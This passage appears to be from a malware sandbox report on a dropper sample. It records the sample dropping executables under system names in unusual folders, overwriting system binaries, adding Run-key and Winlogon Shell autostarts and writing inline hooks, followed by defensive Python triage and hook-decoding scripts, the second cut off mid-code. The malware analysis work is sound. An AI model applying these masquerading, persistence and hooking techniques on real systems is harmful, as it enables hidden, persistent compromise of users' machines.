Source: C:\Recovery\lsass.exe | Section loaded: mscoree.dll
Source: C:\Recovery\lsass.exe | Section loaded: apphelp.dll
Source: C:\Recovery\lsass.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\lsass.exe | Section loaded: version.dll
Source: C:\Recovery\lsass.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\lsass.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\lsass.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\lsass.exe | Section loaded: wldp.dll
Source: C:\Recovery\lsass.exe | Section loaded: profapi.dll
Source: C:\Recovery\lsass.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\lsass.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\lsass.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\lsass.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: sspicli.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: mscoree.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: apphelp.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: version.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: rsaenh.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: sspicli.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: mscoree.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: kernel.appcore.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: version.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: uxtheme.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: windows.storage.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: wldp.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: profapi.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: cryptsp.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: rsaenh.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: cryptbase.dll
Source: C:\blockhostnet\msinto.exe | Section loaded: sspicli.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: mscoree.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: version.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: uxtheme.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: windows.storage.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: wldp.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: profapi.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: cryptsp.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: rsaenh.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: cryptbase.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: sspicli.dll
Source: C:\Recovery\lsass.exe | Section loaded: mscoree.dll
Source: C:\Recovery\lsass.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\lsass.exe | Section loaded: version.dll
Source: C:\Recovery\lsass.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\lsass.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\lsass.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\lsass.exe | Section loaded: wldp.dll
Source: C:\Recovery\lsass.exe | Section loaded: profapi.dll
Source: C:\Recovery\lsass.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\lsass.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\lsass.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\lsass.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: sspicli.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: mscoree.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: version.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: rsaenh.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\debug\explorer.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Zn0uX5K1ez.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Zn0uX5K1ez.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Zn0uX5K1ez.exe | Static file information: File size 8034816 > 1048576
Source: Zn0uX5K1ez.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x79c400
Source: Zn0uX5K1ez.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Zn0uX5K1ez.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: svchost.exe, 00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000000.2102681512.0000000000863000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp, Zn0uX5K1ez.exe, svchost.exe.0.dr
Source: Binary string: :C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.pdb source: msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.pdb source: msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\User\Desktop\payload\obj\Debug\payload.pdb source: Zn0uX5K1ez.exe
Source: C:\blockhostnet\msinto.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"
Source: C:\blockhostnet\msinto.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"
Source: initial sample | Static PE information: section where entry point is pointing to: .SnO
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File created: C:\blockhostnet\__tmp_rar_sfx_access_check_5261625
Source: svchost.exe.0.dr | Static PE information: section name: .didat
Source: explorer.exe.0.dr | Static PE information: section name: .'|?
Source: explorer.exe.0.dr | Static PE information: section name: .h>&
Source: explorer.exe.0.dr | Static PE information: section name: .SnO
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0084F640 push ecx; ret 2_2_0084F653
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_0084EB78 push eax; ret 2_2_0084EB96
Source: C:\blockhostnet\msinto.exe | Code function: 10_2_00007FFD348A474F pushad ; iretd 10_2_00007FFD348A4755
Source: C:\blockhostnet\msinto.exe | Code function: 10_2_00007FFD348A4BAC push es; retf 10_2_00007FFD348A4BAF
Source: C:\blockhostnet\msinto.exe | Code function: 10_2_00007FFD34C9E64E push edx; ret 10_2_00007FFD34C9E652
Source: C:\blockhostnet\msinto.exe | Code function: 10_2_00007FFD34C9EDC0 push ecx; ret 10_2_00007FFD34C9EDC1
Source: C:\blockhostnet\msinto.exe | Code function: 10_2_00007FFD34C9E74C push ecx; ret 10_2_00007FFD34C9E750
Source: C:\blockhostnet\msinto.exe | Code function: 10_2_00007FFD34C9E2BB push es; retf 10_2_00007FFD34C9E2BF
Source: C:\blockhostnet\msinto.exe | Code function: 10_2_00007FFD34C9E6C4 push esi; ret 10_2_00007FFD34C9E6C5
Source: C:\blockhostnet\msinto.exe | Code function: 10_2_00007FFD34C92825 push E8FFFFFFh; retf 10_2_00007FFD34C92831
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD348C1DD6 push ds; iretd 21_2_00007FFD348C1DD7
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD348B474F pushad ; iretd 21_2_00007FFD348B4755
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD348B4BAC push es; retf 21_2_00007FFD348B4BAF
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD348E7DF5 pushad ; iretd 21_2_00007FFD348E7E1D
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD348D6CD2 pushfd ; iretd 21_2_00007FFD348D6CE1
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE135 push edi; ret 21_2_00007FFD34CAE136
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE861 push esp; ret 21_2_00007FFD34CAE862
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE634 push edi; ret 21_2_00007FFD34CAE635
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE655 push edx; ret 21_2_00007FFD34CAE659
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE1FB push ebp; ret 21_2_00007FFD34CAE20B
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE1DB push edi; ret 21_2_00007FFD34CAE1DC
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAED6E push eax; ret 21_2_00007FFD34CAED77
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE560 push edi; ret 21_2_00007FFD34CAE561
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE999 push ebx; ret 21_2_00007FFD34CAE9A6
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE2B7 push ebp; ret 21_2_00007FFD34CAE2C7
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE6B5 push ecx; ret 21_2_00007FFD34CAE6C5
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE678 push edx; ret 21_2_00007FFD34CAE679
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CA2825 push E8FFFFFFh; retf 21_2_00007FFD34CA2831
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Code function: 21_2_00007FFD34CAE793 push ecx; ret 21_2_00007FFD34CAE79A
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Code function: 24_2_00007FFD3488474F pushad ; iretd 24_2_00007FFD34884755
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Code function: 24_2_00007FFD34884BAC push es; retf 24_2_00007FFD34884BAF
Source: msinto.exe.2.dr | Static PE information: section name: .text entropy: 7.5421860659259625
Source: backgroundTaskHost.exe.10.dr | Static PE information: section name: .text entropy: 7.5421860659259625

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe | File created: C:\Users\user\AppData\Local\Temp\explorer.exe
Source: C:\blockhostnet\msinto.exe | File created: C:\Recovery\lsass.exe
Source: C:\blockhostnet\msinto.exe | File created: C:\Windows\debug\explorer.exe
Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe
Source: unknown | Executable created and started: C:\Windows\debug\explorer.exe
Source: unknown | Executable created and started: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\blockhostnet\msinto.exe | File created: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe
Source: C:\blockhostnet\msinto.exe | File created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | File created: C:\Users\user\Desktop\mFVAeiee.log
Source: C:\blockhostnet\msinto.exe | File created: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | File created: C:\Users\user\Desktop\iGvrsCDf.log
Source: C:\blockhostnet\msinto.exe | File created: C:\Users\user\Desktop\AEdPygqV.log
Source: C:\blockhostnet\msinto.exe | File created: C:\Users\user\Desktop\SIVCnSke.log
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | File created: C:\Users\user\Desktop\kRRssUig.log
Source: C:\blockhostnet\msinto.exe | File created: C:\Users\user\Desktop\JfNMDZUx.log
Source: C:\blockhostnet\msinto.exe | File created: C:\Users\user\Desktop\crpSXvpM.log
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File created: C:\blockhostnet\msinto.exe
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | File created: C:\Users\user\Desktop\admBIJoy.log

Boot Survival

Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUA (3 entries)
Source: C:\blockhostnet\msinto.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (6 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msinto (3 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUA (3 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer (3 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost (3 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost (3 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsass (3 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsass (2 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost (2 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer (2 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost (2 entries)
Source: C:\blockhostnet\msinto.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msinto (2 entries)
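The two sections above show one persistence pattern from two angles: PE files dropped under Windows system binary names into directories Windows never installs them in (C:\Recovery\lsass.exe, C:\Windows\debug\explorer.exe, a conhost.exe under MSBuild, a backgroundTaskHost.exe under Globalization\Time Zone), then Run values in both hives plus six writes to Winlogon\Shell. The script below is an added example, not Joe Sandbox or DCRat code: it applies the three checks a responder would run over such an export offline. The drop paths and Run value names are taken from the report; the command lines stored in the Run values (assumed to point at the same-named dropped files), the Winlogon Shell data (the report logs the write, not the data) and the baseline of expected directories are constructed assumptions.

```python
"""Offline triage of the drop paths and autostart entries listed above."""
import ntpath

# Assumed baseline: where Windows itself installs binaries with these names.
# Adjust for the image being triaged; all comparisons are case-insensitive.
EXPECTED_DIRS = {
    "lsass.exe":              {r"c:\windows\system32"},
    "svchost.exe":            {r"c:\windows\system32", r"c:\windows\syswow64"},
    "explorer.exe":           {r"c:\windows", r"c:\windows\syswow64"},
    "conhost.exe":            {r"c:\windows\system32"},
    "backgroundtaskhost.exe": {r"c:\windows\system32"},
}
# Assumed policy: an autostart target is expected under one of these roots.
# C:\Windows itself is deliberately not a root, so C:\Windows\debug, \appcompat
# and \Globalization\Time Zone (all used above) are flagged.
TRUSTED_ROOTS = (r"c:\windows\system32", r"c:\windows\syswow64",
                 r"c:\program files", r"c:\program files (x86)")


def _under(directory, root):
    d, r = directory.lower().rstrip("\\"), root.lower().rstrip("\\")
    return d == r or d.startswith(r + "\\")


def system_name_anomaly(path):
    """Finding if `path` carries a Windows system binary's name but lives
    outside the directory Windows installs it in, else None."""
    directory, name = ntpath.split(path)
    expected = EXPECTED_DIRS.get(name.lower())
    if expected is None or directory.lower().rstrip("\\") in expected:
        return None
    return f"{name} outside {sorted(expected)}: {path}"


def run_target(command):
    """Executable path from a Run-value command line (quoted or first token)."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split(" ", 1)[0]


def run_value_anomaly(hive, name, command):
    """Finding for an autostart value whose target impersonates a system binary
    or lives outside the trusted roots, else None."""
    target = run_target(command)
    reasons = []
    finding = system_name_anomaly(target)
    if finding:
        reasons.append(finding)
    if not any(_under(ntpath.dirname(target), root) for root in TRUSTED_ROOTS):
        reasons.append(f"target outside trusted roots: {target}")
    return f"{hive} Run\\{name}: " + "; ".join(reasons) if reasons else None


def winlogon_shell_anomaly(data):
    """Winlogon\\Shell must be exactly 'explorer.exe'. A path or a second,
    comma-separated command there runs at every interactive logon."""
    return None if data.strip().lower() == "explorer.exe" else f"Winlogon Shell = {data!r}"


# Constructed from the report: dropped PE paths and Run value names. The command
# lines are assumed; the last Run value is a benign control; the Shell data is constructed.
DROPPED = [
    r"C:\Users\user\AppData\Local\Temp\explorer.exe",
    r"C:\Users\user\AppData\Local\Temp\svchost.exe",
    r"C:\blockhostnet\msinto.exe",
    r"C:\Recovery\lsass.exe",
    r"C:\Windows\debug\explorer.exe",
    r"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe",
    r"C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe",
    r"C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe",
]
RUN_VALUES = [
    ("HKLM", "msinto", r'"C:\blockhostnet\msinto.exe"'),
    ("HKLM", "hPeZTHbzcsUskSflSyozwAqUA", r'"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"'),
    ("HKLM", "explorer", r'"C:\Windows\debug\explorer.exe"'),
    ("HKLM", "backgroundTaskHost", r'"C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe"'),
    ("HKLM", "conhost", r'"C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe"'),
    ("HKLM", "lsass", r'"C:\Recovery\lsass.exe"'),
    ("HKLM", "SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
]
WINLOGON_SHELL = r"explorer.exe, C:\Windows\debug\explorer.exe"


def triage(dropped=DROPPED, run_values=RUN_VALUES, shell=WINLOGON_SHELL):
    """All findings for one export, in the order dropped files, Run values, Shell."""
    findings = [f for f in map(system_name_anomaly, dropped) if f]
    findings += [f for f in (run_value_anomaly(*v) for v in run_values) if f]
    finding = winlogon_shell_anomaly(shell)
    if finding:
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for line in triage():
        print(line)
```

Path checks alone do not catch the two in-place overwrites logged above (SecurityHealthSystray.exe in System32 and msedge.exe in its Edge directory): those sit where the legitimate binaries belong, so only Authenticode verification or a hash comparison against a known-good image reveals them.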

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Memory written: PID: 3460 base: 7FFDB4590008 value: E9 EB D9 E9 FF
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Memory written: PID: 3460 base: 7FFDB442D9F0 value: E9 20 26 16 00
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Memory written: PID: 3460 base: 7FFDB45A000D value: E9 BB CB EB FF
Source: C:\Users\user\AppData\Local\Temp\explorer.exe | Memory written: PID: 3460 base: 7FFDB445CBC0 value: E9 5A 34 14 00
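Each row above is a 5-byte write into PID 3460 whose first byte is E9, the opcode of a near JMP with a signed 32-bit displacement measured from the end of the instruction. Decoding the four writes shows where each patch transfers control and that they form two mutually linked pairs. This is an added example, not Joe Sandbox output; its only input is the four (address, bytes) pairs from the rows above. Reading one address of each pair as the hooked function and the other as its trampoline is an interpretation: the report gives no module map to confirm which is which.

```python
"""Decode the E9 rel32 writes logged above and pair them up (added example)."""
import struct

# The four (address, bytes written) rows from the report, PID 3460.
WRITES = [
    (0x7FFDB4590008, bytes.fromhex("E9EBD9E9FF")),
    (0x7FFDB442D9F0, bytes.fromhex("E920261600")),
    (0x7FFDB45A000D, bytes.fromhex("E9BBCBEBFF")),
    (0x7FFDB445CBC0, bytes.fromhex("E95A341400")),
]

MASK64 = (1 << 64) - 1


def decode_jmp_rel32(address, code):
    """Absolute destination of an E9 rel32 (near JMP) written at `address`,
    or None if the bytes are not such an instruction. The displacement is
    signed and relative to the first byte after the 5-byte JMP."""
    if len(code) < 5 or code[0] != 0xE9:
        return None
    (rel,) = struct.unpack("<i", code[1:5])
    return (address + 5 + rel) & MASK64


def decode_all(writes):
    """{write address: JMP destination} for every write, None if not a JMP."""
    return {addr: decode_jmp_rel32(addr, code) for addr, code in writes}


def linked_pairs(writes, window=32):
    """Sorted (a, b) pairs where a's JMP lands within `window` bytes of b and
    b's JMP lands within `window` bytes of a. That is the footprint of an
    inline hook (JMP into a detour) plus the trampoline that jumps back into
    the original function just past the overwritten bytes."""
    dest = decode_all(writes)
    pairs = []
    for a, da in dest.items():
        for b, db in dest.items():
            if (a < b and da is not None and db is not None
                    and abs(da - b) < window and abs(db - a) < window):
                pairs.append((a, b))
    return sorted(pairs)


if __name__ == "__main__":
    for addr, dst in decode_all(WRITES).items():
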